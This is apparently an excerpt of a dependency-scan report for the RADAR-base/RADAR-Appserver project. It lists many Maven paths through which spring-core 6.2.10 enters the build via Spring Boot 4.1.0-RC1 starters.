Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
